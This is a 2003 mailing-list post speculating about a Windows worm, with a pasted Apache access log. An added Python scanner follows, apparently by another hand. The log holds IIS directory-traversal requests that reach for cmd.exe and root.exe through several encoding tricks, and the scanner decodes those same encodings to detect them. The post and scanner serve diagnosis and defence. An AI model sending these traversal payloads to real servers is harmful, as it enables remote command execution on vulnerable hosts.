[plug] Is there *another* Windows worm around?

Craig Ringer craig at postnewspapers.com.au
Tue Jan 28 19:20:56 WST 2003


>>Some of my customer sites are being beaten to a pulp by inbound TCP
>>connections to random addresses at TCP port 80, at about triple the rate of
>>the current MS-SQL (slammer/sapphire) storm, and a steady background of
>>inbound connections to UDP port 137 at about half the MS-SQL rate.

Looks like it could be, yeah. Note all the requests for 
../winnt/system32/cmd.exe and such. OTOH, many worms aim for cmd.exe one 
way or another, so this could just be a resurgence of an old one. *lol* 
maybe all the MS-SQL admins reinstalled their servers and forgot to 
patch up IIS appropriately...

craig at firewall:~$ tail -n 25 /var/log/apache/access.log
202.131.128.228 - - [28/Jan/2003:05:11:11 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.131.128.228 - - [28/Jan/2003:05:11:14 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.131.128.228 - - [28/Jan/2003:05:11:16 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
202.131.128.228 - - [28/Jan/2003:05:11:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
202.131.128.228 - - [28/Jan/2003:05:11:20 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
202.131.128.228 - - [28/Jan/2003:05:11:22 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:24 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:27 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:29 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:32 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
202.131.128.228 - - [28/Jan/2003:05:11:34 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
202.131.128.228 - - [28/Jan/2003:05:11:39 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.131.128.228 - - [28/Jan/2003:05:11:42 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
212.103.155.206 - - [28/Jan/2003:06:08:46 +0800] "GET /sumthin HTTP/1.0" 404 201
80.117.49.128 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html HTTP/1.1" 200 25810
202.72.156.26 - - [28/Jan/2003:11:26:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
202.72.156.26 - - [28/Jan/2003:11:26:57 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
202.72.156.26 - - [28/Jan/2003:11:27:06 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.72.156.26 - - [28/Jan/2003:11:27:16 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
202.72.156.26 - - [28/Jan/2003:11:27:26 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.72.156.26 - - [28/Jan/2003:11:27:36 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
202.72.156.26 - - [28/Jan/2003:11:27:45 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
202.72.156.26 - - [28/Jan/2003:11:27:56 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
64.229.155.191 - - [28/Jan/2003:12:21:42 +0800] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 299
200.53.176.85 - - [28/Jan/2003:19:07:53 +0800] "GET /sumthin HTTP/1.0" 404 201
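As an added example (not part of Craig's post or the list archive), a small Python scanner for the traffic shown above: it undoes the encodings those requests use (stacked %-encoding such as %255c and %%35%63, plus the overlong UTF-8 forms %c0%af and %c1%9c) the way a lax decoder would, then flags any request that resolves to cmd.exe or root.exe, so the same worm traffic is caught whichever variant is in play. The decoder behaviour, the LOG_RE pattern and the target list are assumptions of this example; the sample lines are copied from the log above.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common log format: client ip, timestamp, request line, status (one request per line).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Binaries the requests in the log above resolve to once the encoding is stripped.
TARGETS = ("/winnt/system32/cmd.exe", "/root.exe")

def lax_utf8(data: bytes) -> bytes:
    """Decode overlong 2-byte UTF-8 (lead byte C0/C1) the way a lax decoder does (assumed here):
    the second byte's top bits are ignored, so %c0%af and %c0%2f give '/', %c1%9c and %c1%1c a backslash."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x01) << 6) | (data[i + 1] & 0x3F))  # always ASCII (< 0x80)
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)

def normalize_path(raw: str) -> str:
    """Strip stacked %-encoding and overlong UTF-8, then canonicalise separators and case."""
    data = raw.encode("latin-1", "replace")
    for _ in range(3):  # the log's variants stack at most two %-layers over the UTF-8 trick
        data = lax_utf8(unquote_to_bytes(data))
    return data.decode("latin-1").replace("\\", "/").lower()

def scan(log_text: str) -> list:
    # Returns (client ip, normalised path) for each request that resolves to a target binary.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        path = normalize_path(m["target"].partition("?")[0])  # drop the ?/c+dir query
        if any(t in path for t in TARGETS):
            hits.append((m["ip"], path))
    return hits

# Sample lines copied from the log above, re-joined onto one line each.
SAMPLE_LOG = """\
202.131.128.228 - - [28/Jan/2003:05:11:14 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
202.131.128.228 - - [28/Jan/2003:05:11:24 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
202.131.128.228 - - [28/Jan/2003:05:11:32 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
80.117.49.128 - - [28/Jan/2003:06:38:33 +0800] "GET /~craig/mp3.html HTTP/1.1" 200 25810
202.72.156.26 - - [28/Jan/2003:11:26:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
"""
```

Matching on the normalised path rather than the raw request line is the point: a signature for `%255c` alone misses the `%c0%af`, `%%35%63` and `%25%35%63` variants that appear in the same log.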
